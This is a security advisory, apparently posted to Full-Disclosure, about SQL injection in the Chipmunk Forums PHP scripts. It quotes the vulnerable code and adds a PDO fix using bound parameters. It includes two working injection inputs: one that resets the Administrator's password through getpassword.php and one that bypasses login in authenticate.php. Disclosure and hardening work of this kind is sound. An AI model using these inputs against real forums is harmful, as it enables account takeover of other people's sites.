
[Full-Disclosure] Multiple SQL injection in Chipmunk forum



All information is in attached file.


/*==========================================*/
// GHC Chipmunk forum ADVISORY
// Product: Chipmunk Forums
// URL: http://www.chipmunk-scripts.com/board
// VULNERABILITY CLASS: SQL injection
// RISK: high
/*==========================================*/

[1] script name: getpassword.php

---[code]---
if(isset($_POST['submit']))
{
  $email=$_POST['email'];
  // $email goes into the query without escaping or a bound parameter
  $getinfo="SELECT * from b_users where email='$email'";
  ...
// the new password is mailed to the submitted string, not to the address stored for the matched row
mail("$email","Your Forum password","Your forum password has been set to $value");
---[/code]---

[exploit]
ghc@xxxxxx' or username='Administrator
This changes the Administrator's password without any notification to that account.

[note]
"Administrator" must be a valid user name.
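A hardened replacement for the getpassword.php lookup, added here as an example and not taken from the Chipmunk Forums code. It assumes a PDO connection in `$pdo` (the original scripts use the mysql_* functions) to the same b_users table, with the columns userID, username, email and password that appear in the advisory's queries; the same change, a bound parameter instead of string interpolation, applies to every query quoted in the sections that follow.

```php
<?php
// Added example, not Chipmunk's code: a hardened version of the
// getpassword.php lookup quoted above. Assumes a PDO connection in $pdo
// to the same b_users table (columns userID, username, email, password).

function reset_password_for_email(PDO $pdo, string $email): bool
{
    // Reject anything that is not a plausible address before it reaches SQL.
    $email = filter_var(trim($email), FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        return false;
    }

    // Bound parameter instead of string interpolation: the driver sends the
    // value separately from the SQL text, so a string such as
    // "x@example.com' or username='Administrator" is compared literally as an
    // address and matches no row.
    $stmt = $pdo->prepare(
        'SELECT userID, username, email FROM b_users WHERE email = :email'
    );
    $stmt->execute([':email' => $email]);
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);

    // A reset must resolve to exactly one account; refuse anything else.
    if (count($rows) !== 1) {
        return false;
    }
    $user = $rows[0];

    // Generate the replacement password server-side and store a salted hash
    // (password_hash) rather than the unsalted md5 the original scripts use.
    $newPassword = bin2hex(random_bytes(12));
    $update = $pdo->prepare('UPDATE b_users SET password = :hash WHERE userID = :id');
    $update->execute([
        ':hash' => password_hash($newPassword, PASSWORD_DEFAULT),
        ':id'   => $user['userID'],
    ]);

    // Mail the address stored for the matched row, never the POSTed string,
    // so the result cannot be redirected to whoever submitted the form.
    mail($user['email'], 'Your Forum password',
         "Your forum password has been set to $newPassword");
    return true;
}

// Wire-up matching the original script: only act on a submitted form.
if (isset($_POST['submit'])) {
    reset_password_for_email($pdo, (string) ($_POST['email'] ?? ''));
}
```

With emulated prepares disabled on the PDO connection, the placeholder is handled by the MySQL server itself rather than by client-side quoting.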

[2] script name: authenticate.php

---[code]---
$username=$_POST['user'];
$password=$_POST['password'];
$password=md5($password);
// $username is interpolated unescaped; a quote followed by /* comments out the password and validated checks
$query = "select * from b_users where username='$username' and password='$password' and validated='1'";
---[/code]---

[exploit]
At login.php, enter the user name as
Administrator'/*

[3] script name: edit.php

---[code]---
if(isset($_POST['ID']))
{
  $ID=$_POST['ID'];
}
else
{
  $ID=$_GET['ID'];
}
$checking="SELECT * from b_posts,b_users where b_users.userID=b_posts.author and b_posts.ID='$ID'";
---[/code]---

Possible SQL injection through $ID variable.

[4] search.php

---[code]---
  $searchterm=$_POST['searchterm'];
  $getthreads="SELECT * from b_posts where post like '%$searchterm%' and threadparent='0' order by telapsed DESC limit $start, 50";
---[/code]---

Possible SQL injection through $searchterm.

[5] newtopic.php

---[code]---
       $name=$_POST['name'];
       $title=$_POST['title'];
       $post=$_POST['post'];
       $day=date("D M d, Y H:i:s");
       $timegone=date("U") ;
       if($_POST['nosmiley'])
...
       $name=strip_tags($name);
       $title=strip_tags($title);
       $post=strip_tags($post);
       $posting="INSERT INTO b_posts (author, title, post,timepost, telapsed, postforum,lastpost,nosmilies,ipaddress) values ('$name', '$title', '$post', '$day', '$timegone','$forumID','$user','$nosmiley','$s')";
       mysql_query($posting) or die("could not post");
---[/code]---

Possible SQL injection through $name, $title, $post (strip_tags removes HTML but leaves quotes untouched).

[6] reguser.php 

---[code 1]---
$username=$_POST['username'];
$password=$_POST['password'];
$signature=$_POST['signature'];
$pass2=$_POST['pass2'];
$usercheck="SELECT*from b_users where username='$username' or email='$email'";

---[code 2]---

if ($password==$pass2 && $_POST['password'])
{
  $password=md5($password);
  $supervalue=$value;
  $daycte("U");
  $email=$_POST['email'];
  $location=$_POST['location'];
  $aim=$_POST['aim'];
  $showprofile=$_POST['showprofile'];
  $icq=$_POST['icq'];
  $seedval=$day0000;
  srand($seedval);
  $key=RAND(1000000,2000000);
  if($requirekey=="no"||$requirekey=="No") //if you do not require an activation key
  {
    $SQL ="INSERT into b_users (username,password,sig,email,location,AIM,ICQ,showprofile,validated) values ('$username','$password','$signature','$email','$location','$aim','$icq','$showprofile','1')";
    mysql_query($SQL) or die(mysql_error());
  }
  else //you require an activation key
  {
    $SQL ="INSERT into b_users (username,password,sig,keynode,email,location,AIM,ICQ,showprofile) values ('$username','$password','$signature','$key','$email','$location','$aim','$icq','$showprofile')";
    mysql_query($SQL) or die(mysql_error());
    mail("$email","Your forum activation key","Paste the URL to activate your account. $boardpath/activate.php?username=$username&password=$password&keynode=$key");
  }
---[/code]---

Possible SQL injection through the registration form's variables.

Find a lot of bugs in usercp.php, reply.php, quote.php and others by yourself.

/* ================================================== */
/* www.ghc.ru -- security games & challenges          */
/* ================================================== */
/* greets to: RST.void.ru, D0G4 & all quest hunters %)*/
/* ================================================== */
